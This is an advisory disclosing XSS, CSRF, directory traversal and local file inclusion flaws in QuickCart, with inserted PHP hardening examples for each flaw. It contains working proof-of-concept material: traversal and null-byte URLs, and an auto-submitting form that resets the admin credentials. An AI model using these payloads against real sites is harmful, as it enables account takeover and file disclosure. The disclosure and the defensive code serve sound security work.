QuickCart XSS / XSRF / LFI
Posted Oct 9, 2009
Authored by kl3ryk

QuickCart suffers from cross site scripting, cross site request forgery, and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion, csrf
SHA-256 | 931a91b835fb5cf26189c93ec147cebe81a758e4c66ec6a3aa0c49fc43afd864

DISCOVERED: Paweł 'kl3ryk' Łaskarzewski
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan

DIRECTORY TRAVERSAL
http://victim.com/?p=[ONE OF THE EXISTING FILES]-[EXISTING ACTION IN THIS FILE]-
Most actions load their templates from the wrong directory and then throw an exception.

example:
http://victim.com/?p=../actions_admin/settings-config
#########################
COOKIE XSS
1) In the login form in admin.php.
You need to change the cookie "sLogin" and put your XSS code there. After
that, when you go to http://revival.pl/test/quickcart/admin.php,
you will see your XSS executed.

####templates/admin/login.tpl
<form method="post" action="$sLoginPage" name="form">
<fieldset>
<input type="hidden" name="sLoginPageNext" value="$_SERVER[REQUEST_URI]" />
<div id="login"><label>$lang['Login']:</label><input type="text"
name="sLogin" class="input" value="$_COOKIE[sLogin]" /></div> //XSS
<div id="pass"><label>$lang['Password']:</label><input
type="password" name="sPass" class="input" value="" /></div>
<div id="submit"><input type="submit" value="$lang['log_in']
&raquo;" /></div>
</fieldset>
</form>
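The template above writes the raw cookie value straight into a quoted attribute. The following is an added example, not QuickCart's own code, of the same field rendered with output escaping; the helper names `e()` and `renderLoginField()` are assumptions for illustration.

```php
<?php
// Added example (not QuickCart code): escape untrusted values at the point
// they are written into HTML, instead of interpolating $_COOKIE[sLogin] raw.

function e(string $value): string
{
    // ENT_QUOTES encodes both quote characters, so the value can never end
    // the value="..." attribute early and start a new attribute or tag.
    // ENT_SUBSTITUTE keeps invalid UTF-8 from collapsing to an empty string,
    // which would otherwise hide a tampered cookie from the logs.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable shape from the advisory, shown only for contrast:
//   <input type="text" name="sLogin" class="input" value="$_COOKIE[sLogin]" />
// Any double quote or angle bracket in the cookie lands in the page unencoded.

// Hardened rendering of the same field. Every dynamic part goes through e().
function renderLoginField(string $cookieLogin): string
{
    return '<input type="text" name="sLogin" class="input" value="'
         . e($cookieLogin) . '" />';
}

// The cookie is fully attacker-controlled; treat it like any other request
// input rather than as something the application set itself.
$cookieLogin = isset($_COOKIE['sLogin']) && is_string($_COOKIE['sLogin'])
    ? $_COOKIE['sLogin']
    : '';

echo renderLoginField($cookieLogin);
```

With this in place a cookie containing quotes or tags is emitted as entity-encoded text inside the attribute and is never parsed as markup. The same `e()` wrapper belongs around `$sLoginPage`, `$lang[...]` and `$_SERVER[REQUEST_URI]` in that template, since a reflected request URI is the same class of bug.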

#########################
XSRF for any admin action

POC will change admin login and password in configuration file
<form id="myForm"
action="http://192.168.1.107/quickcart/admin.php?p=settings-config"
method="post">
<input type="text" name="sOption" value="save"/>
<input type="text" name="login" value="admin2"/>
<input type="text" name="pass" value="admin2"/>
</form>
<script>
document.getElementById("myForm").submit();
</script>
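The form above succeeds because the settings-config handler accepts any POST that carries the admin's session cookie. What follows is an added example, not QuickCart's own code, of a per-session anti-CSRF token plus an Origin/Referer check gating a state-changing admin request; the function names, the `csrf_token` field name and the 403 response are assumptions.

```php
<?php
// Added example (not QuickCart code): reject cross-site POSTs to admin actions.

session_start();

// One unguessable token per session, stored server-side and echoed into forms.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or non-string field never matches.
function csrfVerify($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== ''
        && is_string($submitted)
        && hash_equals($expected, $submitted);
}

// Defence in depth: a form auto-submitted from another site arrives with a
// foreign Origin (or Referer). A missing header is treated as cross-site
// for admin writes, which is the conservative choice for this endpoint.
function sameOrigin(): bool
{
    $host = strtolower(explode(':', $_SERVER['HTTP_HOST'] ?? '', 2)[0]);
    $origin = $_SERVER['HTTP_ORIGIN'] ?? ($_SERVER['HTTP_REFERER'] ?? '');
    $originHost = is_string($origin) ? parse_url($origin, PHP_URL_HOST) : null;
    return is_string($originHost) && $host !== '' && strtolower($originHost) === $host;
}

// Gate every state-changing request before touching the configuration file.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrfVerify($_POST['csrf_token'] ?? null) || !sameOrigin()) {
        http_response_code(403);
        exit('Rejected: missing or invalid anti-CSRF token');
    }
    // Only now is it safe to act on sOption=save / login / pass.
}
?>
<form method="post" action="admin.php?p=settings-config">
    <input type="hidden" name="csrf_token"
           value="<?php echo htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8'); ?>" />
    <!-- remaining settings fields -->
</form>
```

The attacker's page cannot read the token out of the admin's session, so the forged POST fails the `csrfVerify()` check. Setting the session cookie with the `SameSite=Lax` or `Strict` attribute adds a browser-side layer on top of this.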

#########################
LFI
In quick.cart there are two ways to pass parameters to the script:
index.php?param1,param2,param3
or
index.php?p=param1-param2-param3

In the first case our LFI is in param3; in the second, the filename is in param1.
Unfortunately both methods have constraints.
The first one changes all special characters (including dots) into their safe
equivalents, and the require statement demands that the file be inside the
actions_client directory.
The second one requires the filename to have a php extension.

example:
http://victim.com/nothing,important,our.file.name.html%00
http://victim.com/?p=../path.to.our.php.file-nothing-important

EXPLANATION:
####index.php:
[CODE]
extract( $_GET );
[...]
$aActions = isset( $p ) ? getAction( $p ) : getUrlFromGet( );
[...]
if( isset( $aActions ) && is_file( 'actions_client/'.$aActions['f'].'.php' ) )
    require 'actions_client/'.$aActions['f'].'.php';
[/CODE]

getUrlFromGet is the function that handles the first method, and getAction
handles the second one.


####libraries/Trash.php
[CODE]
function getAction( $p ){
    global $a;
    if( ereg( '-', $p ) ){
        $aExp = explode( '-', $p );
        $iCount = count( $aExp );
        for( $i = 0; $i < $iCount; $i++ ){
            if( !empty( $aExp[$i] ) ){
                if( $i == 0 )
                    $aActions['f'] = $aExp[$i];
                elseif( $i == 1 )
                    $aActions['a'] = $aExp[$i];
                else{
                    $aActions['o'.( $i - 1 )] = $aExp[$i];
                }
            }
        } // end for
        if( !empty( $aActions['f'] ) && !empty( $aActions['a'] ) ){
            $a = $aActions['a'];
            $aActions['sLink'] = '?p='.$p;
            return $aActions;
        }
    }
}
[/CODE]

As we can see, ereg searches our parameter string for a minus sign, and because
our filename is in the first position we can't use a null byte (%00) to pass a
filename without a php extension.


####core/common.php
[CODE]
function getUrlFromGet( ){
    global $a;
    if( isset( $_GET ) && is_array( $_GET ) ){
        foreach( $_GET as $mKey => $mValue ){
            if( strstr( $mKey, ',' ) ){
                $mKey = htmlspecialchars( $mKey );
[...]
[/CODE]

htmlspecialchars destroys our dreams of a full LFI bug.
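Both the DIRECTORY TRAVERSAL section and the LFI analysis above come down to the same root cause: `$aActions['f']` is built from the query string and concatenated straight into `require`, and `extract( $_GET )` lets the request set `$p` and `$a` directly. The following is an added hardening example for the `?p=file-action-...` dispatcher, not QuickCart's own code. The allow-list built from the directory listing, the `ACTIONS_DIR` constant, the function names and the 404 fallback are assumptions for illustration.

```php
<?php
// Added example (not QuickCart code): dispatch "?p=file-action-opt1-..."
// so that require() can only ever load a vetted file inside actions_client/.

const ACTIONS_DIR = __DIR__ . '/actions_client';

// Allow-list of action names taken from the directory itself, so user input
// is matched against known files instead of being used to build a path.
function allowedActions(): array
{
    $names = [];
    foreach (glob(ACTIONS_DIR . '/*.php') ?: [] as $path) {
        $names[basename($path, '.php')] = true;
    }
    return $names;
}

// Parse "file-action-opt1-opt2" without trusting any segment.
function parseAction(string $p): ?array
{
    // A strict character set rejects "../", null bytes, dots, slashes and
    // their URL-encoded forms before any of them reach a filesystem call.
    if (!preg_match('/^[a-z0-9_]+(?:-[a-z0-9_]+)*$/', $p)) {
        return null;
    }
    $parts = explode('-', $p);
    if (count($parts) < 2) {
        return null; // mirrors the original: both f and a must be present
    }
    $action = ['f' => $parts[0], 'a' => $parts[1]];
    foreach (array_slice($parts, 2) as $i => $opt) {
        $action['o' . ($i + 1)] = $opt;
    }
    return $action;
}

// Map the validated name to a path and prove it still lies inside ACTIONS_DIR.
function actionPath(string $file): ?string
{
    if (!isset(allowedActions()[$file])) {
        return null;
    }
    $real = realpath(ACTIONS_DIR . '/' . $file . '.php');
    $base = realpath(ACTIONS_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // a symlink or traversal escaped the directory
    }
    return $real;
}

// Dispatch. There is deliberately no extract($_GET) here; that call is what
// let the advisory's $p and $a variables be set straight from the query string.
// An empty $p falls through to 404 in this example; substitute the
// application's real default action (assumed, not taken from QuickCart).
$p = isset($_GET['p']) && is_string($_GET['p']) ? $_GET['p'] : '';
$aActions = parseAction($p);
$path = ($aActions !== null) ? actionPath($aActions['f']) : null;

if ($path === null) {
    http_response_code(404);
    exit('Unknown action');
}
require $path;
```

The comma-style `index.php?param1,param2,param3` route is not covered by this block; it needs the same treatment, with its own `htmlspecialchars` step replaced by the allow-list check rather than relied on as the only barrier. Rejected requests are also worth logging with the raw `p` value, since a `../` or `%00` in that parameter is a clear probe signature.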